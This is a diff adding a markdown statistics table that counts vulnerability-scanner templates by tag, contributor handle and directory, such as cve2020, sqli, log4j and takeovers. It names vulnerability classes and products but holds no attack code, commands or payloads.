+| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |
+| tech | 295 | gy741 | 126 | takeovers | 68 | | | | |
+| packetstorm | 276 | arafatansari | 79 | iot | 39 | | | | |
+| token-spray | 230 | madrobot | 65 | network | 37 | | | | |
+| cve2020 | 214 | zzeitlin | 64 | cnvd | 25 | | | | |
+| wpscan | 212 | idealphase | 60 | miscellaneous | 24 | | | | |
+| | 194 | akincibor | 46 | dns | 17 | | | | |
+| cve2022 | 184 | gaurang | 42 | fuzzing | 12 | | | | |
+| unauth | 158 | for3stco1d | 38 | headless | 7 | | | | |
+| config | 147 | philippedelteil | 36 | ssl | 5 | | | | |
+| cve2018 | 144 | adam crosser | 30 | | | | | | |
+| kev | 141 | ice3man | 26 | | | | | | |
+| cve2019 | 135 | c-sh0 | 26 | | | | | | |
+| wp | 134 | organiccrap | 24 | | | | | | |
+| joomla | 133 | ffffffff0x | 22 | | | | | | |
+| apache | 123 | righettod | 22 | | | | | | |
+| default-login | 118 | techbrunchfr | 21 | | | | | | |
+| iot | 116 | cckuailong | 17 | | | | | | |
+| oast | 112 | edoardottt | 17 | | | | | | |
+| cve2010 | 111 | sheikhrishad | 15 | | | | | | |
+| misconfig | 107 | sullo | 15 | | | | | | |
+| sqli | 95 | pr3r00t | 15 | | | | | | |
+| authenticated | 90 | milo2012 | 14 | | | | | | |
+| redirect | 87 | r3dg33k | 14 | | | | | | |
+| login | 87 | 0ri2n | 13 | | | | | | |
+| router | 84 | sharath | 13 | | | | | | |
+| takeover | 74 | tenbird | 13 | | | | | | |
+| token | 72 | melbadry9 | 12 | | | | | | |
+| devops | 71 | johnk3r | 12 | | | | | | |
+| ssrf | 69 | suman_kar | 12 | | | | | | |
+| cve2017 | 67 | dogasantos | 11 | | | | | | |
+| file | 60 | wdahlenb | 11 | | | | | | |
+| auth-bypass | 59 | cyllective | 11 | | | | | | |
+| oracle | 57 | random-robbie | 11 | | | | | | |
+| intrusive | 56 | elsfa7110 | 11 | | | | | | |
+| cms | 55 | alph4byt3 | 10 | | | | | | |
+| network | 55 | nadino | 10 | | | | | | |
+| disclosure | 53 | random_robbie | 10 | | | | | | |
+| seclists | 51 | tess | 10 | | | | | | |
+| cve2016 | 48 | meme-lord | 10 | | | | | | |
+| cisco | 47 | hackergautam | 10 | | | | | | |
+| google | 46 | emadshanab | 9 | | | | | | |
+| cve2015 | 46 | 0x240x23elu | 9 | | | | | | |
+| fileupload | 44 | oppsec | 9 | | | | | | |
+| plugin | 41 | aashiq | 8 | | | | | | |
+| cve2014 | 41 | iamthefrogy | 8 | | | | | | |
+| adobe | 40 | zh | 8 | | | | | | |
+| oss | 39 | logicalhunter | 8 | | | | | | |
+| vulhub | 36 | that_juan_ | 8 | | | | | | |
+| logs | 36 | amit-jd | 7 | | | | | | |
+| aem | 36 | harshbothra_ | 7 | | | | | | |
+| traversal | 35 | randomstr1ng | 7 | | | | | | |
+| vmware | 35 | caspergn | 7 | | | | | | |
+| atlassian | 34 | divya_mudgal | 7 | | | | | | |
+| tenable | 33 | leovalcante | 7 | | | | | | |
+| injection | 33 | dr_set | 7 | | | | | | |
+| listing | 31 | techryptic (@tech) | 7 | | | | | | |
+| hackerone | 31 | kophjager007 | 7 | | | | | | |
+| jira | 31 | puzzlepeaches | 6 | | | | | | |
+| generic | 28 | praetorian-thendrickson | 6 | | | | | | |
+| springboot | 28 | evan rubinstein | 6 | | | | | | |
+| dns | 27 | iamnoooob | 6 | | | | | | |
+| kubernetes | 27 | nullfuzz | 6 | | | | | | |
+| huntr | 27 | forgedhallpass | 6 | | | | | | |
+| log4j | 25 | __fazal | 6 | | | | | | |
+| sap | 25 | veshraj | 6 | | | | | | |
+| cnvd | 25 | pentest_swissky | 6 | | | | | | |
+| microsoft | 23 | _0xf4n9x_ | 6 | | | | | | |
+| proxy | 23 | rootxharsh | 6 | | | | | | |
+| jndi | 22 | imnightmaree | 6 | | | | | | |
+| debug | 22 | pathtaga | 6 | | | | | | |
+| manageengine | 21 | panch0r3d | 5 | | | | | | |
+| misc | 21 | podalirius | 5 | | | | | | |
+| zoho | 21 | yanyun | 5 | | | | | | |
+| wp-theme | 21 | lu4nx | 5 | | | | | | |
+| aws | 20 | joanbono | 5 | | | | | | |
+| fuzz | 20 | ganofins | 5 | | | | | | |
+| cve2012 | 20 | nodauf | 5 | | | | | | |
+| weblogic | 19 | xelkomy | 5 | | | | | | |
+| tomcat | 19 | dolev farhi | 4 | | | | | | |
+| php | 19 | 3th1c_yuk1 | 4 | | | | | | |
+| deserialization | 19 | r3naissance | 4 | | | | | | |
+| dlink | 18 | wisnupramoedya | 4 | | | | | | |
+| k8s | 18 | dadevel | 4 | | | | | | |
+| api | 18 | defr0ggy | 4 | | | | | | |
+| ibm | 18 | scent2d | 4 | | | | | | |
+| camera | 18 | e_schultze_ | 4 | | | | | | |
+| service | 18 | h1ei1 | 4 | | | | | | |
+| jenkins | 17 | tanq16 | 4 | | | | | | |
+| wavlink | 17 | incogbyte | 4 | | | | | | |
+| cloud | 17 | ph33r | 3 | | | | | | |
+| cicd | 16 | dr0pd34d | 3 | | | | | | |
+| struts | 16 | mavericknerd | 3 | | | | | | |
+| cve2009 | 15 | shine | 3 | | | | | | |
+| xxe | 15 | andydoering | 3 | | | | | | |
+| gitlab | 15 | lark-lab | 3 | | | | | | |
+| cve2011 | 15 | davidmckennirey | 3 | | | | | | |
+| firewall | 15 | arcc | 3 | | | | | | |
+| printer | 14 | johnjhacking | 3 | | | | | | |
+| domainmod | 14 | hahwul | 3 | | | | | | |
+| hp | 14 | _generic_human_ | 3 | | | | | | |
+| android | 14 | gitlab red team | 3 | | | | | | |
+| java | 14 | impramodsargar | 3 | | | | | | |
+| lfr | 13 | yash anand @yashanand155 | 3 | | | | | | |
+| ruijie | 13 | yuzhe-zhang-0 | 3 | | | | | | |
+| msf | 13 | alifathi-h1 | 3 | | | | | | |
+| abstractapi | 13 | skeltavik | 3 | | | | | | |
+| cve2013 | 13 | unstabl3 | 3 | | | | | | |
+| drupal | 12 | shifacyclewala | 3 | | | | | | |
+| ftp | 12 | f1tz | 3 | | | | | | |
+| graphql | 12 | binaryfigments | 3 | | | | | | |
+| confluence | 12 | splint3r7 | 3 | | | | | | |
+| nginx | 12 | emenalf | 3 | | | | | | |
+| netsweeper | 12 | me9187 | 3 | | | | | | |
+| status | 12 | thomas_from_offensity | 3 | | | | | | |
+| magento | 12 | 0w4ys | 3 | | | | | | |
+| rails | 12 | its0x08 | 3 | | | | | | |
+| netgear | 12 | powerexploit | 3 | | | | | | |
+| woocommerce | 11 | fyoorer | 3 | | | | | | |
+| cve2008 | 11 | mr-xn | 3 | | | | | | |
+| microweber | 11 | sushantkamble | 3 | | | | | | |
+| cisa | 11 | supras | 3 | | | | | | |
+| backup | 11 | dudez | 3 | | | | | | |
+| airflow | 11 | ekrause | 3 | | | | | | |
+| glpi | 11 | atomiczsec | 3 | | | | | | |
+| cnvd2021 | 11 | jarijaas | 3 | | | | | | |
+| amazon | 11 | lucasljm2001 | 3 | | | | | | |
+| azure | 11 | z3bd | 3 | | | | | | |
+| jolokia | 10 | fxploit | 3 | | | | | | |
+| github | 10 | whoever | 3 | | | | | | |
+| zyxel | 10 | geekby | 2 | | | | | | |
+| grafana | 10 | joeldeleep | 2 | | | | | | |
+| django | 10 | afaq | 2 | | | | | | |
+| fortigate | 10 | z0ne | 2 | | | | | | |
+| coldfusion | 10 | kre80r | 2 | | | | | | |
+| dell | 10 | bing0o | 2 | | | | | | |
+| spring | 10 | udit_thakkur | 2 | | | | | | |
+| fortinet | 9 | dheerajmadhukar | 2 | | | | | | |
+| laravel | 9 | 0xcrypto | 2 | | | | | | |
+| webserver | 9 | lotusdll | 2 | | | | | | |
+| kube | 9 | socketz | 2 | | | | | | |
+| ruby | 9 | 0xprial | 2 | | | | | | |
+| auth | 9 | raesene | 2 | | | | | | |
+| phpmyadmin | 9 | cristi vlad (@cristivlad25) | 2 | | | | | | |
+| prometheus | 9 | redteambrasil | 2 | | | | | | |
+| windows | 9 | manas_harsh | 2 | | | | | | |
+| backdoor | 9 | gal nagli | 2 | | | | | | |
+| vcenter | 9 | bananabr | 2 | | | | | | |
+| iis | 9 | prajiteshsingh | 2 | | | | | | |
+| fastjson | 9 | smaranchand | 2 | | | | | | |
+| mirai | 9 | nvn1729 | 2 | | | | | | |
+| wso2 | 9 | 0xrudra | 2 | | | | | | |
+| zabbix | 9 | foulenzer | 2 | | | | | | |
+| dedecms | 9 | nuk3s3c | 2 | | | | | | |
+| config-audit | 8 | codexlynx | 2 | | | | | | |
+| blind | 8 | cocxanh | 2 | | | | | | |
+| ssti | 8 | 0xsmiley | 2 | | | | | | |
+| citrix | 8 | vavkamil | 2 | | | | | | |
+| zimbra | 8 | amsda | 2 | | | | | | |
+| headless | 8 | nkxxkn | 2 | | | | | | |
+| audit | 8 | y4er | 2 | | | | | | |
+| vpn | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | |
+| scada | 8 | dbrwsky | 2 | | | | | | |
+| git | 8 | 0xsapra | 2 | | | | | | |
+| metadata | 8 | x1m_martijn | 2 | | | | | | |
+| jboss | 8 | pxmme1337 | 2 | | | | | | |
+| kafka | 8 | thezakman | 2 | | | | | | |
+| solr | 8 | hackerarpan | 2 | | | | | | |
+| ssl | 8 | cckuakilong | 2 | | | | | | |
+| elasticsearch | 8 | n-thumann | 2 | | | | | | |
+| recon | 8 | myztique | 2 | | | | | | |
+| cisco-switch | 8 | koti2 | 2 | | | | | | |
+| sonicwall | 8 | israel comazzetto dos reis | 2 | | | | | | |
+| icewarp | 7 | ambassify | 2 | | | | | | |
+| firebase | 7 | 0xnirvana | 2 | | | | | | |
+| druid | 7 | kiblyn11 | 2 | | | | | | |
+| symfony | 7 | swissky | 2 | | | | | | |
+| jetbrains | 7 | thardt-praetorian | 2 | | | | | | |
+| mail | 7 | danielmofer | 2 | | | | | | |
+| docker | 7 | badboycxcc | 2 | | | | | | |
+| python | 7 | r12w4n | 2 | | | | | | |
+| bucket | 7 | bp0lr | 2 | | | | | | |
+| cnvd2020 | 7 | w4cky_ | 2 | | | | | | |
+| files | 7 | ajaysenr | 2 | | | | | | |
+| solarview | 7 | luci | 2 | | | | | | |
+| exchange | 7 | g4l1t0 | 2 | | | | | | |
+| maps | 7 | bernardofsr | 2 | | | | | | |
+| squirrelmail | 7 | 0xelkomy | 2 | | | | | | |
+| seeyon | 6 | paperpen | 2 | | | | | | |
+| emerge | 6 | joshlarsen | 2 | | | | | | |
+| setup | 6 | bsysop | 2 | | | | | | |
+| npm | 6 | ree4pwn | 2 | | | | | | |
+| go | 6 | github.com/its0x08 | 2 | | | | | | |
+| vms | 6 | parth | 2 | | | | | | |
+| zhiyuan | 6 | taielab | 2 | | | | | | |
+| sitecore | 6 | zomsop82 | 2 | | | | | | |
+| liferay | 6 | k11h-de | 2 | | | | | | |
+| cobbler | 6 | v0idc0de | 2 | | | | | | |
+| bypass | 6 | huowuzhao | 2 | | | | | | |
+| ecology | 6 | sy3omda | 2 | | | | | | |
+| rconfig | 6 | clarkvoss | 2 | | | | | | |
+| bigip | 6 | moritz nentwig | 2 | | | | | | |
+| huawei | 6 | hetroublemakr | 2 | | | | | | |
+| slack | 6 | randomrobbie | 2 | | | | | | |
+| samsung | 6 | ehsahil | 2 | | | | | | |
+| websphere | 6 | rafaelwdornelas | 2 | | | | | | |
+| magmi | 6 | uomogrande | 2 | | | | | | |
+| enum | 6 | paradessia | 2 | | | | | | |
+| jetty | 6 | ricardo maia (brainfork) | 2 | | | | | | |
+| fpd | 6 | dahse89 | 2 | | | | | | |
+| artica | 6 | 666asd | 2 | | | | | | |
+| crlf | 6 | fabaff | 2 | | | | | | |
+| nodejs | 6 | sbani | 2 | | | | | | |
+| kubelet | 6 | martincodes-de | 2 | | | | | | |
+| ofbiz | 6 | gevakun | 2 | | | | | | |
+| ognl | 6 | brenocss | 2 | | | | | | |
+| lucee | 6 | mohammedsaneem | 2 | | | | | | |
+| ssh | 5 | convisoappsec | 2 | | | | | | |
+| minio | 5 | vsh00t | 2 | | | | | | |
+| storage | 5 | d4vy | 2 | | | | | | |
+| fatpipe | 5 | wabafet | 1 | | | | | | |
+| strapi | 5 | 0xh7ml | 1 | | | | | | |
+| metinfo | 5 | liquidsec | 1 | | | | | | |
+| leak | 5 | push4d | 1 | | | | | | |
+| firmware | 5 | zsusac | 1 | | | | | | |
+| opensis | 5 | evan rubinstien | 1 | | | | | | |
+| rfi | 5 | true13 | 1 | | | | | | |
+| error | 5 | official_blackhat13 | 1 | | | | | | |
+| symantec | 5 | tim_koopmans | 1 | | | | | | |
+| rseenet | 5 | noamrathaus | 1 | | | | | | |
+| gogs | 5 | shifacyclewla | 1 | | | | | | |
+| cache | 5 | bernardo rodrigues | 1 | | | | | | |
+| | | @bernardofsr | | | | | | | |
+| avideo | 5 | amnotacat | 1 | | | | | | |
+| moodle | 5 | izn0u | 1 | | | | | | |
+| 74cms | 5 | sickwell | 1 | | | | | | |
+| alibaba | 5 | jcockhren | 1 | | | | | | |
+| apisix | 5 | infosecsanyam | 1 | | | | | | |
+| jamf | 5 | bjhulst | 1 | | | | | | |
+| keycloak | 5 | daviey | 1 | | | | | | |
+| plesk | 5 | becivells | 1 | | | | | | |
+| thinkphp | 5 | shreyapohekar | 1 | | | | | | |
+| nagios | 5 | arr0way | 1 | | | | | | |
+| solarwinds | 5 | kishore krishna (sillydaddy) | 1 | | | | | | |
+| cockpit | 5 | yashanand155 | 1 | | | | | | |
+| gocd | 5 | mrcl0wnlab | 1 | | | | | | |
+| circarlife | 5 | brabbit10 | 1 | | | | | | |
+| node | 5 | knassar702 | 1 | | | | | | |
+| scan | 5 | jeya seelan | 1 | | | | | | |
+| elfinder | 5 | streetofhackerr007 (rohit | 1 | | | | | | |
+| | | soni) | | | | | | | |
+| carrental | 5 | maximus decimus | 1 | | | | | | |
+| mongodb | 4 | osamahamad | 1 | | | | | | |
+| flink | 4 | pry0cc | 1 | | | | | | |
+| gnuboard | 4 | b0yd | 1 | | | | | | |
+| smtp | 4 | ratnadip gajbhiye | 1 | | | | | | |
+| kibana | 4 | j3ssie/geraldino2 | 1 | | | | | | |
+| voip | 4 | elmahdi | 1 | | | | | | |
+| hoteldruid | 4 | sicksec | 1 | | | | | | |
+| mailchimp | 4 | jbertman | 1 | | | | | | |
+| resin | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | |
+| terramaster | 4 | florianmaak | 1 | | | | | | |
+| db | 4 | danigoland | 1 | | | | | | |
+| search | 4 | evolutionsec | 1 | | | | | | |
+| telesquare | 4 | ph33rr | 1 | | | | | | |
+| oa | 4 | akshansh | 1 | | | | | | |
+| hongdian | 4 | kurohost | 1 | | | | | | |
+| install | 4 | justmumu | 1 | | | | | | |
+| oauth | 4 | retr02332 | 1 | | | | | | |
+| hikvision | 4 | apt-mirror | 1 | | | | | | |
+| horde | 4 | hexcat | 1 | | | | | | |
+| puppet | 4 | ggranjus | 1 | | | | | | |
+| adminer | 4 | orpheus | 1 | | | | | | |
+| sophos | 4 | akash.c | 1 | | | | | | |
+| stripe | 4 | makyotox | 1 | | | | | | |
+| hybris | 4 | aaronchen0 | 1 | | | | | | |
+| microstrategy | 4 | p-l- | 1 | | | | | | |
+| elastic | 4 | andirrahmani1 | 1 | | | | | | |
+| tikiwiki | 4 | philippdelteil | 1 | | | | | | |
+| redmine | 4 | bartu utku sarp | 1 | | | | | | |
+| openemr | 4 | piyushchhiroliya | 1 | | | | | | |
+| nexus | 4 | act1on3 | 1 | | | | | | |
+| roxy | 4 | davidfegyver | 1 | | | | | | |
+| royalevent | 4 | natto97 | 1 | | | | | | |
+| springcloud | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | |
+| filemanager | 4 | momen eldawakhly | 1 | | | | | | |
+| artifactory | 4 | ldionmarcil | 1 | | | | | | |
+| yeswiki | 4 | jas37 | 1 | | | | | | |
+| sangfor | 4 | mhdsamx | 1 | | | | | | |
+| phppgadmin | 4 | vzamanillo | 1 | | | | | | |
+| prestashop | 4 | adrianmf | 1 | | | | | | |
+| vbulletin | 4 | th3.d1p4k | 1 | | | | | | |
+| xmlrpc | 4 | ola456 | 1 | | | | | | |
+| ems | 4 | elder tao | 1 | | | | | | |
+| couchdb | 4 | clment cruchet | 1 | | | | | | |
+| caucho | 4 | furkansayim | 1 | | | | | | |
+| beyondtrust | 4 | 1nf1n7y | 1 | | | | | | |
+| telerik | 4 | iampritam | 1 | | | | | | |
+| wcs | 4 | blckraven | 1 | | | | | | |
+| aspose | 4 | luqman | 1 | | | | | | |
+| cve2007 | 4 | 0xd0ff9 | 1 | | | | | | |
+| postmessage | 4 | screamy | 1 | | | | | | |
+| asp | 4 | bernardo rodrigues | 1 | | | | | | |
+| | | @bernardofsr | andrรฉ monteiro | | | | | | | |
+| | | @am0nt31r0 | | | | | | | |
+| phpinfo | 4 | whynotke | 1 | | | | | | |
+| hashicorp | 4 | hakimkt | 1 | | | | | | |
+| sonarqube | 4 | b4uh0lz | 1 | | | | | | |
+| activemq | 4 | sshell | 1 | | | | | | |
+| vrealize | 4 | unkl4b | 1 | | | | | | |
+| parallels | 4 | udyz | 1 | | | | | | |
+| awstats | 4 | rubina119 | 1 | | | | | | |
+| jellyfin | 4 | husain | 1 | | | | | | |
+| sql | 4 | deena | 1 | | | | | | |
+| cnvd2019 | 4 | yashgoti | 1 | | | | | | |
+| kevinlab | 4 | lark lab | 1 | | | | | | |
+| cacti | 4 | miryangjung | 1 | | | | | | |
+| redis | 4 | iphantasmic | 1 | | | | | | |
+| hpe | 4 | ahmed sherif | 1 | | | | | | |
+| photo | 4 | kr1shna4garwal | 1 | | | | | | |
+| thinkcmf | 4 | luqmaan hadia | 1 | | | | | | |
+| | | [luqiih](https://github.com/luqiih) | | | | | | | |
+| database | 4 | zhenwarx | 1 | | | | | | |
+| panos | 4 | droberson | 1 | | | | | | |
+| paypal | 4 | rschio | 1 | | | | | | |
+| consul | 3 | amanrawat | 1 | | | | | | |
+| exposures | 3 | kba@sogeti_esec | 1 | | | | | | |
+| fileman | 3 | xshuden | 1 | | | | | | |
+| goanywhere | 3 | alevsk | 1 | | | | | | |
+| ivanti | 3 | kailashbohara | 1 | | | | | | |
+| dom | 3 | undefl0w | 1 | | | | | | |
+| dolibarr | 3 | aaron_costello | 1 | | | | | | |
+| | | (@conspiracyproof) | | | | | | | |
+| openam | 3 | w0tx | 1 | | | | | | |
+| nacos | 3 | opencirt | 1 | | | | | | |
+| targa | 3 | 2rs3c | 1 | | | | | | |
+| servicenow | 3 | shelld3v | 1 | | | | | | |
+| geoserver | 3 | mesaglio | 1 | | | | | | |
+| matrix | 3 | higor melgaรงo (eremit4) | 1 | | | | | | |
+| finecms | 3 | ok_bye_now | 1 | | | | | | |
+| octobercms | 3 | b0rn2r00t | 1 | | | | | | |
+| wordfence | 3 | dawid-czarnecki | 1 | | | | | | |
+| actuator | 3 | manasmbellani | 1 | | | | | | |
+| mcafee | 3 | regala_ | 1 | | | | | | |
+| smb | 3 | manuelbua | 1 | | | | | | |
+| openbmcs | 3 | thebinitghimire | 1 | | | | | | |
+| jupyter | 3 | s1r1u5_ | 1 | | | | | | |
+| umbraco | 3 | hardik-rathod | 1 | | | | | | |
+| webmail | 3 | patralos | 1 | | | | | | |
+| panabit | 3 | ringo | 1 | | | | | | |
+| splunk | 3 | tea | 1 | | | | | | |
+| glassfish | 3 | ling | 1 | | | | | | |
+| ec2 | 3 | httpvoid | 1 | | | | | | |
+| grav | 3 | nobody | 1 | | | | | | |
+| thinfinity | 3 | streetofhackerr007 | 1 | | | | | | |
+| subrion | 3 | rodnt | 1 | | | | | | |
+| dzzoffice | 3 | harshinsecurity | 1 | | | | | | |
+| voipmonitor | 3 | alperenkesk | 1 | | | | | | |
+| messaging | 3 | lixts | 1 | | | | | | |
+| jfrog | 3 | open-sec | 1 | | | | | | |
+| seagate | 3 | majidmc2 | 1 | | | | | | |
+| graph | 3 | coldfish | 1 | | | | | | |
+| cloudflare | 3 | daffianfo | 1 | | | | | | |
+| kentico | 3 | xstp | 1 | | | | | | |
+| javascript | 3 | exploitation | 1 | | | | | | |
+| concrete | 3 | kabirsuda | 1 | | | | | | |
+| weiphp | 3 | jeya.seelan | 1 | | | | | | |
+| heroku | 3 | arm!tage | 1 | | | | | | |
+| ampps | 3 | zandros0 | 1 | | | | | | |
+| trixbox | 3 | elitebaz | 1 | | | | | | |
+| aptus | 3 | exceed | 1 | | | | | | |
+| rlm | 3 | prettyboyaaditya | 1 | | | | | | |
+| microfocus | 3 | fmunozs | 1 | | | | | | |
+| hsphere | 3 | jbaines-r7 | 1 | | | | | | |
+| metabase | 3 | aringo | 1 | | | | | | |
+| log | 3 | lethargynavigator | 1 | | | | | | |
+| graylog | 3 | bad5ect0r | 1 | | | | | | |
+| lotus | 3 | sherlocksecurity | 1 | | | | | | |
+| dreambox | 3 | pjborah | 1 | | | | | | |
+| workspaceone | 3 | pudsec | 1 | | | | | | |
+| r-seenet | 3 | bughuntersurya | 1 | | | | | | |
+| square | 3 | d0rkerdevil | 1 | | | | | | |
+| axigen | 3 | furkansenan | 1 | | | | | | |
+| technology | 3 | tirtha_mandal | 1 | | | | | | |
+| sentry | 3 | hakluke | 1 | | | | | | |
+| sugarcrm | 3 | _c0wb0y_ | 1 | | | | | | |
+| sendgrid | 3 | compr00t | 1 | | | | | | |
+| sharepoint | 3 | arall | 1 | | | | | | |
+| samba | 3 | geraldino2 | 1 | | | | | | |
+| ebs | 3 | mubassirpatel | 1 | | | | | | |
+| blockchain | 3 | f1she3 | 1 | | | | | | |
+| selea | 3 | jteles | 1 | | | | | | |
+| httpd | 3 | remonsec | 1 | | | | | | |
+| thruk | 3 | ooooooo_q | 1 | | | | | | |
+| trendnet | 3 | charanrayudu | 1 | | | | | | |
+| getsimple | 3 | elouhi | 1 | | | | | | |
+| bigant | 3 | alexrydzak | 1 | | | | | | |
+| lansweeper | 3 | schniggie | 1 | | | | | | |
+| bruteforce | 3 | oscarintherocks | 1 | | | | | | |
+| kingsoft | 3 | 0ut0fb4nd | 1 | | | | | | |
+| buffalo | 3 | phyr3wall | 1 | | | | | | |
+| geowebserver | 3 | ohlinge | 1 | | | | | | |
+| mongo | 3 | chron0x | 1 | | | | | | |
+| globalprotect | 3 | kiks7 | 1 | | | | | | |
+| 3cx | 3 | nytr0gen | 1 | | | | | | |
+| nosqli | 3 | marcos_iaf | 1 | | | | | | |
+| httpbin | 3 | h4kux | 1 | | | | | | |
+| axis2 | 3 | erethon | 1 | | | | | | |
+| digitalocean | 3 | intx0x80 | 1 | | | | | | |
+| netdata | 3 | ahmetpergamum | 1 | | | | | | |
+| bitrix | 3 | ptonewreckin | 1 | | | | | | |
+| tableau | 3 | vinit989 | 1 | | | | | | |
+| zte | 3 | mass0ma | 1 | | | | | | |
+| elementor | 3 | francescocarlucci | 1 | | | | | | |
+| fanruan | 3 | fq_hsu | 1 | | | | | | |
+| nuuo | 3 | bibeksapkota (sar00n) | 1 | | | | | | |
+| prtg | 3 | kareemse1im | 1 | | | | | | |
+| intercom | 3 | _harleo | 1 | | | | | | |
+| epson | 3 | miroslavsotak | 1 | | | | | | |
+| fuelcms | 3 | xeldax | 1 | | | | | | |
+| centos | 3 | breno_css | 1 | | | | | | |
+| mobileiron | 3 | zinminphy0 | 1 | | | | | | |
+| pentaho | 3 | soyelmago | 1 | | | | | | |
+| pip | 3 | hanlaomo | 1 | | | | | | |
+| tenda | 3 | lamscun | 1 | | | | | | |
+| digitalrebar | 3 | djoevanka | 1 | | | | | | |
+| circleci | 3 | rotemreiss | 1 | | | | | | |
+| nortek | 3 | _darrenmartyn | 1 | | | | | | |
+| modem | 3 | cookiehanhoan | 1 | | | | | | |
+| rackn | 3 | anon-artist | 1 | | | | | | |
+| cve2005 | 3 | bywalks | 1 | | | | | | |
+| synology | 3 | ricardomaia | 1 | | | | | | |
+| movable | 3 | micha3lb3n | 1 | | | | | | |
+| linksys | 3 | omarkurt | 1 | | | | | | |
+| empirecms | 3 | aceseven (digisec360) | 1 | | | | | | |
+| netlify | 3 | mantissts | 1 | | | | | | |
+| zeroshell | 3 | narluin | 1 | | | | | | |
+| facebook | 3 | gboddin | 1 | | | | | | |
+| axis | 3 | 0xelkomy & c0nqr0r | 1 | | | | | | |
+| odoo | 3 | thesubtlety | 1 | | | | | | |
+| linkerd | 3 | retr0 | 1 | | | | | | |
+| omnia | 3 | un-fmunozs | 1 | | | | | | |
+| jeesns | 3 | kaizensecurity | 1 | | | | | | |
+| drawio | 3 | juicypotato1 | 1 | | | | | | |
+| dotcms | 3 | 0xtavian | 1 | | | | | | |
+| s3 | 3 | pdp | 1 | | | | | | |
+| fortios | 3 | kh4sh3i | 1 | | | | | | |
+| kkfileview | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | |
+| | | security | | | | | | | |
+| teamcity | 3 | dievus | 1 | | | | | | |
+| webadmin | 3 | pratik khalane | 1 | | | | | | |
+| azkaban | 2 | qlkwej | 1 | | | | | | |
+| natshell | 2 | flag007 | 1 | | | | | | |
+| versa | 2 | paper-pen | 1 | | | | | | |
+| metersphere | 2 | korteke | 1 | | | | | | |
+| node-red-dashboard | 2 | wlayzz | 1 | | | | | | |
+| h3c | 2 | absshax | 1 | | | | | | |
+| wwbn | 2 | yuansec | 1 | | | | | | |
+| flightpath | 2 | ofjaaah | 1 | | | | | | |
+| maian | 2 | nerrorsec | 1 | | | | | | |
+| overflow | 2 | 0xceba | 1 | | | | | | |
+| electron | 2 | jiheon-dev | 1 | | | | | | |
+| mailgun | 2 | andysvints | 1 | | | | | | |
+| accela | 2 | dhiyaneshdki | 1 | | | | | | |
+| kettle | 2 | remi gascou (podalirius) | 1 | | | | | | |
+| homematic | 2 | sec_hawk | 1 | | | | | | |
+| rackstation | 2 | luskabol | 1 | | | | | | |
+| sysaid | 2 | duty_1g | 1 | | | | | | |
+| dvwa | 2 | co0nan | 1 | | | | | | |
+| pam | 2 | berkdusunur | 1 | | | | | | |
+| openfire | 2 | matthew nickerson (b0than) @ | 1 | | | | | | |
+| | | layer 8 security | | | | | | | |
+| pascom | 2 | 0xteles | 1 | | | | | | |
+| forum | 2 | s0obi | 1 | | | | | | |
+| lighttpd | 2 | willd96 | 1 | | | | | | |
+| pcoip | 2 | x6263 | 1 | | | | | | |
+| guacamole | 2 | failopen | 1 | | | | | | |
+| servicedesk | 2 | ipanda | 1 | | | | | | |
+| highmail | 2 | 0h1in9e | 1 | | | | | | |
+| openssh | 2 | toufik-airane | 1 | | | | | | |
+| tidb | 2 | revblock | 1 | | | | | | |
+| rancher | 2 | fopina | 1 | | | | | | |
+| lantronix | 2 | luqmaan hadia | 1 | | | | | | |
+| idrac | 2 | thevillagehacker | 1 | | | | | | |
+| ebook | 2 | j33n1k4 | 1 | | | | | | |
+| commax | 2 | yavolo | 1 | | | | | | |
+| landesk | 2 | rotembar | 1 | | | | | | |
+| phpshowtime | 2 | 5up3r541y4n | 1 | | | | | | |
+| auerswald | 2 | skylark-lab | 1 | | | | | | |
+| flir | 2 | ilovebinbash | 1 | | | | | | |
+| key | 2 | affix | 1 | | | | | | |
+| ucmdb | 2 | noraj | 1 | | | | | | |
+| linux | 2 | ahmed abou-ela | 1 | | | | | | |
+| favicon | 2 | jrolf | 1 | | | | | | |
+| adiscon | 2 | c3l3si4n | 1 | | | | | | |
+| fastcgi | 2 | petruknisme | 1 | | | | | | |
+| jitsi | 2 | arjunchandarana | 1 | | | | | | |
+| netsus | 2 | aresx | 1 | | | | | | |
+| circontrol | 2 | 0xceeb | 1 | | | | | | |
+| traefik | 2 | 0xrod | 1 | | | | | | |
+| mbean | 2 | notsoevilweasel | 1 | | | | | | |
+| gophish | 2 | rojanrijal | 1 | | | | | | |
+| webcam | 2 | noobexploiter | 1 | | | | | | |
+| pulse | 2 | borna nematzadeh | 1 | | | | | | |
+| globaldomains | 2 | exid | 1 | | | | | | |
+| cve2006 | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | |
+| chyrp | 2 | nielsing | 1 | | | | | | |
+| gradle | 2 | alex | 1 | | | | | | |
+| froxlor | 2 | notnotnotveg | 1 | | | | | | |
+| kong | 2 | calumjelrick | 1 | | | | | | |
+| angular | 2 | igibanez | 1 | | | | | | |
+| eprints | 2 | tirtha | 1 | | | | | | |
+| xsuite | 2 | mah3sec_ | 1 | | | | | | |
+| jeedom | 2 | | | | | | | | |
+| cas | 2 | | | | | | | | |
+| rosariosis | 2 | | | | | | | | |
+| plastic | 2 | | | | | | | | |
+| hjtcloud | 2 | | | | | | | | |
+| idea | 2 | | | | | | | | |
+| nextjs | 2 | | | | | | | | |
+| openwrt | 2 | | | | | | | | |
+| ghost | 2 | | | | | | | | |
+| motorola | 2 | | | | | | | | |
+| konga | 2 | | | | | | | | |
+| jmx | 2 | | | | | | | | |
+| saltstack | 2 | | | | | | | | |
+| wpqa | 2 | | | | | | | | |
+| dvr | 2 | | | | | | | | |
+| teampass | 2 | | | | | | | | |
+| showdoc | 2 | | | | | | | | |
+| orchid | 2 | | | | | | | | |
+| conductor | 2 | | | | | | | | |
+| sas | 2 | | | | | | | | |
+| bmc | 2 | | | | | | | | |
+| frontpage | 2 | | | | | | | | |
+| netis | 2 | | | | | | | | |
+| livezilla | 2 | | | | | | | | |
+| bigbluebutton | 2 | | | | | | | | |
+| smartstore | 2 | | | | | | | | |
+| akamai | 2 | | | | | | | | |
+| seeddms | 2 | | | | | | | | |
+| ranger | 2 | | | | | | | | |
+| dubbo | 2 | | | | | | | | |
+| zblogphp | 2 | | | | | | | | |
+| emqx | 2 | | | | | | | | |
